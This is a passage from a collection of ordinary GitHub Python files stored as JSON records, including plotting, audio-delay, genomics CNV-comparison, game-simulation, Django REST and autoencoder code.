night_dic['u'],night_dic['v']\n f_u, f_v = B_u/np.array(night_dic['wave_vis']), B_v/np.array(night_dic['wave_vis'])\n \n if units == 'm':\n im1 = axis.scatter(B_u,B_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n im2 = axis.scatter(-B_u,-B_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n axis.set_title(f'uv plane for the night of {formatted_night}')\n axis.set_xlabel(r'u (m)')\n axis.set_ylabel(r'v (m)')\n\n\n # axis.set_ylim(0,1.5)\n else:\n im1 = axis.scatter(f_u,f_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n im2 = axis.scatter(-f_u,-f_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n axis.set_title(f'uv plane for the night of {formatted_night}')\n axis.set_xlabel(r'u ($\\lambda . rad^{-1})$')\n axis.set_ylabel(r'v ($\\lambda . rad^{-1})$')\n \n return im1, im2\n def plot_all(self,units='m',save=True, save_path = ''):\n ## Units: can be meters (m) or spatial frequencies (f)\n \n fig, axis = plt.subplots(len(self.nights),2,gridspec_kw={'width_ratios': [1, 2]})\n fig.set_size_inches(22,6*len(self.nights))\n fig.tight_layout(pad=6)\n im = []\n if len(self.nights)==1:\n for i, night in enumerate(self.nights):\n im1 = self.plot_vis(axis[1],units,night)\n im2,im3 = self.plot_uv_plane(axis[0],units,night)\n im.append(im1)\n im.append(im2)\n\n else:\n for i, night in enumerate(self.nights):\n im1 = self.plot_vis(axis[i,1],units,night)\n im2,im3 = self.plot_uv_plane(axis[i,0],units,night)\n im.append(im1)\n im.append(im2)\n \n for ax in axis[:,1]:\n fig.colorbar(im[i], ax=ax)\n\n last_obs_date = self.nights[-1]\n fig.suptitle(f\"Observations of {self.obs_dic['Target_name']}\", fontsize=25)\n if save:\n plt.savefig(save_path + f\"{self.obs_dic['Target_name']}_observations_{last_obs_date.month}_{last_obs_date.year}.png\")\n","repo_name":"Philippepr08/STAGE_M2","sub_path":"observation_plotter.py","file_name":"observation_plotter.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39605250942","text":"import numpy as np\nimport soundfile as sf\n\n\ndef delay(xn, a, d, af, n):\n \"\"\"Entry Parameters\n xn = Signal Entry\n a = Amplitude delayed signal\n d = Delay time\n af = Amplitude feedback signal\n n = Quantity of delays\n \"\"\"\n l = len(xn)\n for i in range(n):\n if i == 0:\n delay = a*(np.hstack((np.zeros(d), xn)))\n delay2 = af * (np.hstack((np.zeros(d), delay)))\n delay = np.hstack((delay, np.zeros(d)))\n xn = np.hstack((xn, np.zeros(2*d)))\n delay = delay + delay2\n else:\n delay = a*(np.hstack((np.zeros(d), delay)))\n delay2 = af*(np.hstack((np.zeros(d), delay)))\n delay = np.hstack((delay, np.zeros(d)))\n delay = delay+delay2\n xn = np.hstack((xn, np.zeros(2*d)))\n delay = delay + delay2\n delay = xn + delay\n return delay\n\n\nfs = 44100\nxn, fs = sf.read('Midi69.wav')\n'cantidad de repeticiones'\nn = 2\n'Muestas atrazadas'\nd = round(0.5 * fs)\n'Amplitud de los delays'\na = 0.5\n'Amplitud de la realimentacion'\naf = 0.5\nsynth = delay(xn, a, d, af, n)\nsf.write('echo.wav', synth, fs)\n","repo_name":"PabloRO07/SIUNTREF","sub_path":"Dsp/TP2 Karplus-Strong/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27512385535","text":"import sbg_cveto_util as cveto\nimport pandas as pd\nfrom collections import Counter\nimport itertools\nimport matplotlib.pyplot as plt\nimport seaborn as sb\n\n\n# Read ploidy\ndef read_purple_ploidy(path):\n skiprows = 0\n header = 0\n sep = '\\t'\n comment = '#'\n df = pd.read_csv(filepath_or_buffer=path, skiprows=skiprows,\n header=header, comment=comment, sep=sep,\n dtype={\"ploidy\": float, \"purity\": float})\n ploidy = df['ploidy'][0]\n ploidy_to_return = round(float(ploidy), 2)\n\n return ploidy_to_return\n\n\ndef read_controlfreec_ploidy(path):\n ploidy = 2\n with open(path) as openfile:\n for line in openfile:\n if 'Output_Ploidy' in line:\n parts = line.split('\\t')\n ploidy = float(parts[1].split('\\n')[0])\n\n return ploidy\n return ploidy\n\n\ndef read_sclust_ploidy(path):\n f = open(path, \"r\")\n header_line = f.readline()\n header_indexes = header_line.split('\\t')\n value_line = f.readline()\n value_indexes = value_line.split('\\t')\n data_dict = dict(zip(header_indexes, value_indexes))\n ploidy_value = (data_dict['ploidy'])\n ploidy = float(ploidy_value)\n ploidy = int(ploidy)\n return ploidy\n\n\ndef read_facets_ploidy(path):\n skiprows = 0\n header = 0\n sep = '\\t'\n comment = '#'\n df = pd.read_csv(filepath_or_buffer=path, skiprows=skiprows,\n header=header, comment=comment, sep=sep)\n ploidy = df['ploidy'][0]\n ploidy_to_return = round(float(ploidy), 2)\n\n return ploidy_to_return\n\n\n# Additional methods\n\ndef load_file(cnv_file, name):\n caller = name\n df, ploidy = cveto.read_csv(cnv_file, caller, None)\n\n # Remove CHR, Chr, chr from chromosome name\n # This also ensures that X is X and not x\n df['chromosome'] = df['chromosome'].str.upper().str.replace('CHR', '')\n\n # Keep 1, 2, ... 22, X chromosomes\n valid_chroms = (\n '1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 X Y'.split()\n )\n cond = df['chromosome'].isin(valid_chroms)\n df = df[cond]\n\n return df, cveto.to_regions(df), ploidy\n\n\ndef delete_small_and_na_regions(df):\n df = df.drop(df[df.length == 1.0].index)\n df['length'] = pd.to_numeric(df.length, errors='coerce')\n df.dropna(inplace=True)\n return df\n\n\ndef calculate_stats_total(df, column_name_part, tumor, stats_type):\n groups = [col for col in df.columns if column_name_part in col]\n stats = df.groupby(groups).agg({'length': 'sum'})\n stats.to_csv('{}_{}.STATS.csv'.format(stats_type, tumor))\n return stats\n\n\ndef calculate_stats_per_file(stats, column):\n stats = stats.reset_index().groupby(column).sum()\n stats.to_csv('{}_.STATS_per_file.csv'.format(column))\n return stats\n\n\ndef delete_chr_start_end_columns(df):\n df.drop('chromosome', inplace=True, axis=1)\n df.drop('start', inplace=True, axis=1)\n df.drop('end', inplace=True, axis=1)\n\n\ndef delete_status_columns(df):\n for column in df.columns:\n if '_status' in column:\n df.drop(column, inplace=True, axis=1)\n\n\ndef adjust_values_to_nearest(df_old, df_new, all_values, column):\n caller_values = []\n for index, value in df_old[column].items():\n if value not in all_values:\n closest_value = min(all_values, key=lambda x: abs(x - value))\n df_new.at[index, column] = closest_value\n caller_values.append(closest_value)\n else:\n caller_values.append(value)\n return df_new, caller_values\n\n\ndef create_combination_of_columns_list(df):\n callers_to_combine = []\n for column in df.columns:\n if 'length' not in column:\n callers_to_combine.append(column)\n callers_to_combine_list = list(\n itertools.combinations(callers_to_combine, 2))\n return callers_to_combine_list\n\n\ndef create_heatmap(caller_one, caller_two, df, tumor, method):\n src = df.groupby([caller_one, caller_two]).agg({'length': 'sum'})\n src = src.unstack(level=0)\n src.columns = src.columns.get_level_values(1)\n src.fillna(0, inplace=True)\n fig, ax = plt.subplots(figsize=(11, 9))\n # plot heatmap\n if str(method) == 'STATUS':\n annot = True\n title = 'Comparison of statuses per length from two files'\n else:\n annot = False\n title = 'Comparison of cr values per length from two files'\n ay = sb.heatmap(src, cmap=\"Blues\", linewidth=0.3,\n cbar_kws={\"shrink\": .8, 'label': 'Length'}, annot=annot)\n ay.invert_yaxis()\n plt.xlabel(caller_one)\n plt.ylabel(caller_two)\n plt.title(title)\n plt.savefig(\n '{}_{}_{}_{}.heatmap.png'.format(caller_one, caller_two, method,\n tumor))\n plt.close(fig)\n return src\n\n\n# Interpret\n\n\ndef get_callers_index(df):\n list_of_callers_index = []\n for i in range(0, len(df.columns)):\n if '_status' in df.columns[i]:\n list_of_callers_index.append(i)\n return list_of_callers_index\n\n\ndef precise_call(row, list_of_callers_index):\n \"\"\"\n Return value is ambigous if not all callers agree on it.\n \"\"\"\n all_calls = []\n for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n all_calls.append(row[i])\n c = Counter(all_calls)\n if len(c.most_common()) > 1:\n return 'ambiguous'\n else:\n value, count = c.most_common()[0]\n return value\n\n\ndef majority_call(row, list_of_callers_index):\n \"\"\"\n Return value is the most common value. If two values are most common, result is ambiguous.\n \"\"\"\n all_calls = []\n for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n all_calls.append(row[i])\n c = Counter(all_calls)\n if len(c.most_common()) > 1:\n if not (c.most_common()[0][1] == c.most_common()[1][1]):\n value, count = c.most_common()[0]\n return value\n else:\n return 'ambiguous'\n else:\n value, count = c.most_common()[0]\n return value\n\n\ndef delete_ambiguous_regions(df, tumor, interpret_method):\n df = df.drop(df[df.final_call == 'ambiguous'].index)\n if interpret_method == 'MAJORITY':\n add = 'majority_calls'\n elif interpret_method == 'PRECISE':\n add = 'precise_calls'\n else:\n add = 'undefined'\n df.to_csv('{}.{}.{}.FINAL_result.csv'.format(tumor, interpret_method, add))\n\n\ndef segment_regions(df_new, df_old, tumor, interpret_method):\n for row in df_old.iterrows():\n index_old = row[0] # index of old df\n if df_new.empty:\n index_new = 0\n df_new.loc[df_old.index[index_new]] = df_old.iloc[index_old]\n continue\n if df_old['chromosome'].iloc[index_old] == df_new['chromosome'].iloc[\n index_new # this will work because it will\n # always go through the first if\n ]:\n final_call_old = df_old['final_call'].iloc[index_old]\n final_call_new = df_new['final_call'].iloc[index_new]\n if final_call_old == final_call_new:\n df_new.at[df_new.index[index_new], 'end'] = (\n df_old.iloc[index_old]['end']\n )\n df_new.at[df_new.index[index_new], 'length'] = (\n df_old.iloc[index_old]['end'] - df_new.iloc[index_new][\n 'start']\n )\n else:\n df_new.loc[df_new.index.max() + 1] = df_old.iloc[index_old]\n index_new = index_new + 1\n else:\n df_new.loc[df_new.index.max() + 1] = df_old.iloc[index_old]\n index_new = index_new + 1\n df_new.to_csv(\n '{}_{}.seg_with_ambiguous.csv'.format(tumor, interpret_method))\n return df_new\n\n\n# Plotly visualisations\ndef final_call(row, list_of_callers_index):\n all_calls = []\n for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n all_calls.append(row[i])\n all_calls.sort()\n return '-'.join(all_calls)\n \ndef calculate_metrics_for_benchmark(callers, df_calculate_metrics):\n \"\"\"\n This should be run to calculate metrics when benchmarking multiple callers.\n \"\"\"\n import json\n truth_combinations = []\n # Create combinations of all samples\n callers_to_combine_total = list(itertools.combinations(callers, 2))\n # Leave only combinations with truth set\n for callers_pair in callers_to_combine_total:\n for caller_name in callers_pair:\n if 'truth' in caller_name.lower():\n truth_combinations.append(list(callers_pair))\n\n metrics_dict = {}\n for truth_combination_pair in truth_combinations:\n # set truth set to be the first element in the list\n if 'truth' in truth_combination_pair[1].lower():\n truth_combination_pair[0], truth_combination_pair[1] = truth_combination_pair[1], truth_combination_pair[0]\n # Set correct column name\n for column in df_calculate_metrics.columns:\n if truth_combination_pair[0] in column:\n truth_column = ('_'.join(column.split('_')[:-1]))\n if truth_combination_pair[1] in column:\n caller_column = ('_'.join(column.split('_')[:-1]))\n # calculate metrics\n metrics_dict[truth_combination_pair[1]] = cveto.calculate_metrics(\n df_calculate_metrics, truth_column, caller_column\n )\n metrics_dict[truth_combination_pair[1]] = metrics_dict[truth_combination_pair[1]].to_dict()\n with open('benchmark_metrics.json', 'w') as metrics:\n json.dump(metrics_dict, metrics)\n df = pd.read_json('benchmark_metrics.json')\n df.to_csv('benchmark_metrics.csv')","repo_name":"kids-first/kf-somatic-workflow","sub_path":"scripts/sbg_multicnv_methods.py","file_name":"sbg_multicnv_methods.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"4591734752","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#train data\nfb = pd.read_csv('/datasets/dataset_facebook_cosmetics.csv', sep = ';')\n\n#data crop\nX = fb.drop('Total Interactions', axis = 1)\ny = fb['Total Interactions']\n\nmodel = RandomForestRegressor()\n\n#ML\nmodel.fit(X, y)\n\n#prediction\npredictions = model.predict(X)\n\n#show plot\nsns.scatterplot(y, predictions, s = 15, alpha = 0.6)\nplt.title('График Прогноз-Факт')\nplt.ylabel('Прогноз')\nplt.xlabel('Факт')\nplt.show()\n\n##I: очевидно, что есть переобучение + тест по тем же данным","repo_name":"Saramag256/WP_vandal_control","sub_path":"apicache-py3/ML/Test Binary.py","file_name":"Test Binary.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29570117176","text":"def pig_latin(words):\n reply = []\n for word in words:\n i = 0\n for a in word:\n if a in \"aeiou\":\n break\n i += 1\n if i == 0:\n piggy = word + \"yay\"\n else:\n piggy = word[i:] + word[:i] + \"ay\"\n if word[:1].isupper():\n piggy = piggy.title()\n reply.append(piggy)\n print(reply)\n return reply\n\n# while True:\n# pig = input(\"Enter word to translate into pig latin: \")\n# pig_latin(pig)\n\n","repo_name":"succinction/Python","sub_path":"pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30528566804","text":"from game import *\n\n\nclass RecognitionGame(Game):\n \"\"\"\n Similar to the standard disclosure game, but the true drinking type\n is only revealed after a referral, which ends the game.\n In addition, signallers can only fuzzily differentiate between responder types.\n Observing a social payoff that could come from any responder type will not allow\n an update.\n Observing one that could come from 2 types is evidence for both.\n Observing a unique response constitutes a type revelation.\n \"\"\"\n\n def name(self):\n return \"recognition\"\n\n def play_round(self, signaller, receiver):\n \"\"\" Play a round of this game between the\n two players.\n \"\"\"\n signal = signaller.do_signal(receiver)\n act = receiver.respond(signal, opponent=signaller)\n signal_payoff = self.woman_baby_payoff[signaller.player_type][act] + self.woman_social_payoff[signal][receiver.player_type]\n receive_payoff = self.midwife_payoff[signaller.player_type][act]\n\n signaller.accrued_payoffs += signal_payoff\n receiver.accrued_payoffs += receive_payoff\n\n #Signaller learns something about the type\n social = self.woman_social_payoff[signal][receiver.player_type]\n\n possible_types = []\n\n for i in range(len(self.woman_social_payoff[signal])):\n if social == self.woman_social_payoff[signal][i]:\n possible_types.append(i)\n #True type is known\n if len(possible_types) == 1:\n signaller.update_beliefs(act, receiver, signal_payoff)\n else:\n try:\n signaller.fuzzy_update_beliefs(act, receiver, signal_payoff, possible_types)\n except AttributeError:\n # Must be a payoff type agent. \n pass\n #But the responder doesn't unless they referred\n if act == 1:\n receiver.update_beliefs(receive_payoff, signaller, signal)\n signaller.is_finished = True\n else:\n receiver.rounds -= 1\n\n\nclass CaseloadRecognitionGame(CaseloadGame, RecognitionGame):\n \"\"\"\n Identical with the regular recognition game, but uses caseloading to assign\n women to midwives.\n \"\"\"\n","repo_name":"greenape/disclosure-game","sub_path":"python/disclosuregame/disclosuregame/Games/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"14338086322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Name: Elmer Rodriguez\n# Institution: University of Rochester\n# Professor: Richard Sarkis\n# Course: CSC 161: INTRO TO PROGRAMMING\n# Assignment: Computer and Programs\n# All Rights Reserved\n\n\n# File: lab_computer_programs.py\n# A simple program illustrating chaotic behavior.\n\n#Defining the main function\ndef main():\n\n #Printing a line to the user in order to program some context of the program\n print(\"\\nThis program illustrates a chaotic function\")\n #The following line is asking the user \"How manu numbers should the program print?\" and storing that information on the variable (n)\n n = input(\"How many numbers should I print? \")\n #The following line is asking the user \"Enter a number between 0 and 1:\" and storing that information on the variable (x)\n x = input(\"Enter a number between 0 and 1: \")\n #Running a loop within the parameters provided by the user (n) and printing an output stored in the variable (x)\n for i in range(n):\n x = 3.9 * x * (1 - x)\n print(x)\n\n#calling the main function\nmain()\n","repo_name":"erodri17/Python3","sub_path":"lab_computer_programs.py","file_name":"lab_computer_programs.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33602677213","text":"from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import Team\nfrom .serializers import TeamSerialiser\n\nfrom django.http import HttpResponse\n\n\n@api_view(['POST'])\ndef create_team(request):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=403)\n else:\n serialiser = TeamSerialiser(data=request.data)\n if serialiser.is_valid():\n serialiser.save()\n return Response(serialiser.data, status=200)\n else:\n return Response(serialiser.errors, status=400)\n\n\n@api_view(['GET'])\ndef get_team(request, team_id):\n team = Team.objects.get(team_id=team_id)\n serializer = TeamSerialiser(team)\n return Response(serializer.data, status=200)\n\n\n@api_view(['GET'])\ndef get_teams(request):\n teams = Team.objects.all()\n serializer = TeamSerialiser(teams, many=True)\n return Response(serializer.data, status=200)\n\n\n@api_view(['PUT'])\ndef update_team(request, team_id):\n if request.user.is_authenticated is False:\n return Response(\"User not authenticated\", status=403)\n else:\n team = Team.objects.get(team_id=team_id)\n team_name_formatted = f\"{team.name} - {team.join_code}\"\n if (str(request.user.team_id) != str(team_name_formatted)):\n return HttpResponse(\"User isn't authenticated to make changes to this team\", status=403)\n else:\n if (request.user.team_admin is False):\n return HttpResponse(\"User isn't an admin of this team\", status=403)\n else:\n serializer = TeamSerialiser(instance=team, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n\n\n@api_view(['DELETE'])\ndef delete_team(request, team_id):\n if (request.user.is_authenticated is False):\n return Response(\"User is not authenticated\", status=403)\n else:\n team = Team.objects.get(team_id=team_id)\n team_name_formatted = f\"{team.name} - {team.join_code}\"\n if (str(request.user.team_id) != str(team_name_formatted) and request.user.team_admin is False):\n return Response(\"User is not authorised to delete this team\", status=403)\n else:\n team.delete()\n request.user.team_admin = False\n request.user.team_id = None\n request.user.save()\n return Response(\"Team successfully deleted\", status=200)\n","repo_name":"codersforcauses/csf","sub_path":"server/api/team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"12702746423","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Layer, Dense\nfrom tensorflow.keras import Model, regularizers, initializers\nimport numpy as np\nimport json\n\nfrom tensorflow.python.training.tracking.data_structures import NoDependency\n\nfrom utils.net2net import net2wider, net2deeper\n\n\n# https://github.com/paulpjoby/DynGEM\nclass PartCoder(Layer):\n def __init__(self, input_dim, output_dim=2, hidden_dims=None, l1=0.01, l2=0.01, seed=6):\n super(PartCoder, self).__init__()\n self.l1 = l1\n self.l2 = l2\n self.seed = seed\n # self.layers = NoDependency([])\n # self.__dict__['layers'] = []\n self.layers = []\n\n _input_dim = input_dim\n for i, dim in enumerate(hidden_dims):\n layer = Dense(\n units=dim,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, _input_dim))\n _input_dim = dim\n self.layers.append(layer)\n\n # Final, adding output_layer (latent/reconstruction layer)\n layer = Dense(\n units=output_dim,\n activation=tf.nn.sigmoid,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=6),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, _input_dim))\n self.layers.append(layer)\n\n def wider(self, added_size=1, pos_layer=None):\n layers_size = len(self.layers)\n if layers_size < 2:\n raise ValueError(\"Number of layer must be greater than 2.\")\n if pos_layer is None:\n pos_layer = max(layers_size - 2, 0)\n elif pos_layer >= layers_size - 1 or pos_layer < 0:\n raise ValueError(\n f\"pos_layer is expected less than length of layers (pos_layer in [0, layers_size-2])\")\n\n # TODO: get biggest value to divide for new weights\n weights, bias = self.layers[pos_layer].get_weights()\n weights_next_layer, bias_next_layer = self.layers[pos_layer + 1].get_weights()\n\n new_weights, new_bias, new_weights_next_layer = net2wider(weights, bias, weights_next_layer, added_size)\n\n src_units, des_units = weights.shape[0], weights.shape[1] + added_size\n next_des_units = weights_next_layer.shape[1]\n\n wider_layer = Dense(\n units=des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2)\n )\n\n # input_shape = (batch_size, input_features).\n # input_features = number of units in layer = length(layer) = output of previous layer\n wider_layer.build(input_shape=(None, src_units))\n wider_layer.set_weights([new_weights, new_bias])\n\n next_layer = Dense(\n units=next_des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2)\n )\n next_layer.build(input_shape=(None, des_units))\n next_layer.set_weights([new_weights_next_layer, bias_next_layer])\n\n self.layers[pos_layer] = wider_layer\n self.layers[pos_layer + 1] = next_layer\n\n def deeper(self, pos_layer=None):\n layers_size = len(self.layers)\n if pos_layer is None:\n pos_layer = max(layers_size - 2, 0)\n elif pos_layer >= layers_size - 1 or pos_layer < 0:\n raise ValueError(\n f\"pos_layer is expected less than length of layers (pos_layer in [0, layers_size-2]).\")\n\n weights, bias = self.layers[pos_layer].get_weights()\n new_weights, new_bias = net2deeper(weights)\n des_units = weights.shape[1]\n # TODO: add initial kernel\n layer = Dense(\n units=des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n )\n layer.build(input_shape=(None, des_units))\n layer.set_weights([new_weights, new_bias])\n\n self.layers.insert(pos_layer + 1, layer)\n\n def set_dump_weight(self, dum_weight=None):\n for i in range(len(self.layers)):\n w, b = self.layers[i].get_weights()\n\n for u in range(w.shape[0]):\n for v in range(w.shape[1]):\n if dum_weight is None:\n w[u][v] = u * w.shape[1] + v\n else:\n w[u][v] = dum_weight\n for v in range(b.shape[0]):\n b[v] = v\n if dum_weight is None:\n b[v] = v\n else:\n b[v] = dum_weight\n\n self.layers[i].set_weights([w, b])\n\n def call(self, inputs):\n z = inputs\n for layer in self.layers:\n z = layer(z)\n\n return z\n\n def info(self, show_weight=False, show_config=False):\n print(f\"{self.name}\\n----------\")\n print(f\"Number of layers: {len(self.layers)}\")\n for i, layer in enumerate(self.layers):\n print(f\"Layer {i + 1}\\n\\t Name={layer.name}\\n\\t Shape ={layer.get_weights()[0].shape}\")\n if show_weight:\n print(f\"\\t Weight= {layer.get_weights()}\")\n if show_config:\n print(f\"Config: {json.dumps(layer.get_config(), sort_keys=True, indent=4)}\")\n\n def get_length_layers(self):\n return len(self.layers)\n\n def begin_insert_layer(self, layer_dim):\n # `self.layers[0].get_weights()` -> [weights, bias]\n next_units = self.layers[0].get_weights()[0].shape[0]\n layer = Dense(\n units=next_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, layer_dim))\n self.layers.insert(0, layer)\n\n def last_insert_layer(self, layer_dim):\n prev_weights, prev_bias = self.layers[len(self.layers) - 1].get_weights()\n prev_units = prev_weights.shape[1]\n\n replace_prev_layer = Dense(\n units=prev_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n )\n replace_prev_layer.build(input_shape=(None, prev_weights.shape[0]))\n replace_prev_layer.set_weights([prev_weights, prev_bias])\n\n added_layer = Dense(\n units=layer_dim,\n activation=tf.nn.sigmoid,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n added_layer.build(input_shape=(None, prev_units))\n\n del self.layers[len(self.layers) - 1]\n self.layers.append(replace_prev_layer)\n self.layers.append(added_layer)\n\n def get_layers_size(self):\n layers_size = []\n for layer in self.layers:\n weights, _ = layer.get_weights()\n layers_size.append(weights.shape)\n # print(\"layer_size: \", layers_size)\n return layers_size\n\n def get_weights(self):\n '''\n\n :return: [[weights, bias],[],...]\n '''\n layer_weights = []\n for layer in self.layers:\n layer_weights.append(layer.get_weights())\n return layer_weights\n\n def set_weights(self, weights):\n '''\n\n :param weights: [[weights, bias],[],...]\n :return:\n '''\n for i in range(0, len(self.layers)):\n # self.layers[i].build(input_shape=(None, weights[i][0].shape[1]))\n if not self.layers[i].get_weights():\n self.layers[i].build(input_shape=(None, len(weights[i][0])))\n self.layers[i].set_weights(weights[i])\n\n\nclass Autoencoder(Model):\n def __init__(self, input_dim, embedding_dim, hidden_dims=None, v1=0.01, v2=0.01):\n super(Autoencoder, self).__init__()\n self.input_dim = input_dim\n self.embedding_dim = embedding_dim\n\n if hidden_dims is None:\n hidden_dims = [512, 128]\n\n self.hidden_dims = hidden_dims\n self.l1 = v1\n self.l2 = v2\n\n self.encoder = PartCoder(input_dim=input_dim, output_dim=embedding_dim, hidden_dims=hidden_dims, l1=self.l1,\n l2=self.l2)\n self.decoder = PartCoder(input_dim=embedding_dim, output_dim=input_dim, hidden_dims=hidden_dims[::-1],\n l1=self.l1,\n l2=self.l2)\n\n def wider(self, added_size=1, pos_layer=None):\n if pos_layer is None:\n pos_layer = self.encoder.get_length_layers() - 2\n\n self.encoder.wider(added_size=added_size, pos_layer=pos_layer)\n self.decoder.wider(added_size=added_size, pos_layer=self.decoder.get_length_layers() - pos_layer - 2)\n\n def deeper(self, pos_layer=None):\n if pos_layer is None:\n pos_layer = self.encoder.get_length_layers() - 2\n\n self.encoder.deeper(pos_layer=pos_layer)\n self.decoder.deeper(pos_layer=self.decoder.get_length_layers() - pos_layer - 2)\n\n def call(self, inputs):\n Y = self.encoder(inputs)\n X_hat = self.decoder(Y)\n return X_hat, Y\n\n def get_embedding(self, inputs):\n return self.encoder(inputs)\n\n def get_reconstruction(self, inputs):\n return self.decoder(self.encoder(inputs))\n\n def info(self, show_weight=False, show_config=False):\n self.encoder.info(show_weight, show_config)\n self.decoder.info(show_weight, show_config)\n\n def expand_first_layer(self, layer_dim):\n self.input_dim = layer_dim\n self.encoder.begin_insert_layer(layer_dim=layer_dim)\n self.decoder.last_insert_layer(layer_dim=layer_dim)\n self.hidden_dims = self.get_hidden_dims()\n\n def get_layers_size(self):\n '''\n Return size of the encoder layers part. Suppose layers of decoder has same size as the encoder\n :return: layers size of encoder part\n '''\n return self.encoder.get_layers_size()\n\n def get_input_dim(self):\n return self.input_dim\n\n def set_dum_weight(self, dum_weight):\n self.encoder.set_dump_weight(dum_weight)\n self.decoder.set_dump_weight(dum_weight)\n\n def get_weights_model(self):\n '''\n Return a list of layer weights in the total of model\n :return: [[encoder_layer_weights],[decoder_layer_weights]]\n '''\n return [self.encoder.get_weights(), self.decoder.get_weights()]\n\n def set_weights_model(self, weights):\n encoder_weights, decoder_weights = weights\n self.encoder.set_weights(encoder_weights)\n self.decoder.set_weights(decoder_weights)\n\n def get_config_layer(self):\n config_layer = {\n \"input_dim\": self.input_dim,\n \"embedding_dim\": self.embedding_dim,\n \"hidden_dims\": self.hidden_dims,\n \"l1\": self.l1,\n \"l2\": self.l2\n }\n return config_layer\n\n def get_hidden_dims(self):\n hidden_dims = []\n for i, (l1, l2) in enumerate(self.get_layers_size()):\n if i == 0:\n continue\n hidden_dims.append(l1)\n return hidden_dims\n\n\nif __name__ == \"__main__\":\n # print(\"\\n#######\\nEncoder\")\n # # Suppose: 4 -> 3-> 5 -> 2\n # encoder = PartCoder(output_dim=2, hidden_dims=[3, 5])\n # x = tf.ones((3, 4))\n # y = encoder(x)\n # # print(\"y=\", y)\n # # encoder.info(show_weight=True, show_config=False)\n # encoder.deeper()\n # y = encoder(x)\n # # print(\"y=\", y)\n # print(\"After deeper\")\n # encoder.info(show_weight=True, show_config=False)\n #\n # # ----------- Decoder -----------\n # print(\"\\n####\\nDecoder\")\n # # Suppose: 2 -> 5 -> 3 -> 4\n #\n # decoder = PartCoder(output_dim=4, hidden_dims=[5, 3])\n # x = tf.ones((3, 2))\n # y = decoder(x)\n # # print(\"y=\", y)\n # # encoder.info(show_weight=True, show_config=False)\n # decoder.deeper()\n # y = decoder(x)\n # # print(\"y=\", y)\n # print(\"After deeper\")\n # decoder.info(show_weight=True, show_config=False)\n\n # print(\"\\n#######\\nWider encoder\")\n # # Suppose: 2 -> 3 -> 2\n # encoder = PartCoder(output_dim=2, hidden_dims=[3, 4, 1])\n # x = tf.ones((3, 2))\n #\n # print(\"[Original] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n # print(\"[Original_1] y=\", encoder(x))\n #\n # encoder.set_dump_weight()\n # print(\"[Dump] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.wider(added_size=4)\n # print(\"After wider\")\n # print(\"[Wider] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.deeper()\n # print(\"\\n###### Deeper \")\n # print(\"[Deeper] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n #\n # encoder.wider()\n # print(\"\\n##### Wider\")\n # print(\"[Wider] y=\", encoder(x))\n # encoder.info(show_weight=True, show_config=False)\n\n # ------ Test autoencoder ---------\n # ae = 